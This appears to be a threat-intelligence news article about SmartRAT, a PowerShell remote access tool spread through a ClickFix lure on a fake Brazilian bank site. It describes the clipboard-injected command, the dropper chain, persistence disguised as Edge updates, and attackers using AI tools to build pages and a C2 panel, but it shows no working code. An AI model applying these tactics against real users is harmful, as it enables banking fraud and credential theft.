A recent cyberattack operation has surfaced, leveraging sophisticated phishing techniques and PowerShell to deploy a perilous malware known as SmartRAT. This campaign primarily targets Brazilian bank customers, combining social engineering with AI-enhanced web pages to enhance its realism.
Targeting Brazilian Banks with AI-Powered Tools
The malicious actors have constructed a counterfeit website emulating a prominent Brazilian bank. This site includes a seemingly authentic credit card application and a deceptive security check prompt. Users who engage with the page are inadvertently coaxed into executing a malicious PowerShell command, which subsequently downloads and installs SmartRAT on their systems.
The malware is capable of logging keystrokes, capturing screenshots, intercepting QR codes, and displaying fake full-screen banking forms to harvest user credentials. Analysts at Zscaler ThreatLabz, who identified this threat in March 2026, reported that the fraudulent site was likely created using AI-driven website generation tools. The page source revealed AI-generated code indicators, such as templated comments and automated structuring.
Innovative Deception Techniques
This campaign is particularly dangerous due to its multi-layered deception tactics. Initially, the phishing page presents a fake Cloudflare CAPTCHA, followed by a simulated Blue Screen of Death to induce panic and compel users to follow instructions. This method, termed ClickFix, tricks users into believing their system has crashed and that executing a specific command is the only solution.
SmartRAT, a comprehensive remote access tool written in PowerShell, allows attackers to monitor browser activity for banking interactions. Once a victim accesses a financial site or app, the attacker can manipulate the screen, inject keystrokes, block input, and steal entered data.
Exploiting PowerShell for Malware Deployment
The infection process begins when a victim unknowingly pastes a PowerShell command into the Windows Run dialog, which has been secretly inserted into their clipboard by the attack page. This command connects to a remote server to download a file named st.txt, serving as a covert dropper that retrieves an encrypted PowerShell script, ultimately executing SmartRAT.
SmartRAT conceals its presence by disguising its files and tasks as Microsoft Edge updates, blending in with legitimate Windows processes. It seeks to escalate privileges by requesting UAC approval and, if granted, installs itself as a Windows service with SYSTEM-level access. Even if denied, it persists through hidden processes and registry entries.
AI-Driven Infrastructure and Security Flaws
Researchers also discovered that the attackers utilized AI tools to build their command-and-control (C2) panel, which manages infected systems. The panel’s security was weak, with a client-side login system that could be bypassed easily. This vulnerability suggests the code was developed rapidly and without thorough review, likely with AI assistance.
The C2 panel, branded MyGood PRO, provides attackers with real-time control over infected machines, including screen streaming and the ability to alter banking QR codes. The operation targets numerous Brazilian financial institutions, indicating a focused and well-funded campaign.
To safeguard against such threats, users should be wary of websites that prompt them to paste commands into their systems, even if they appear to be legitimate bank or security prompts. Organizations are advised to monitor unusual PowerShell activity, unexpected tasks, and connections to unknown IP addresses. Employing endpoint protection tools that detect script-based threats remains crucial in defending against attacks like SmartRAT.
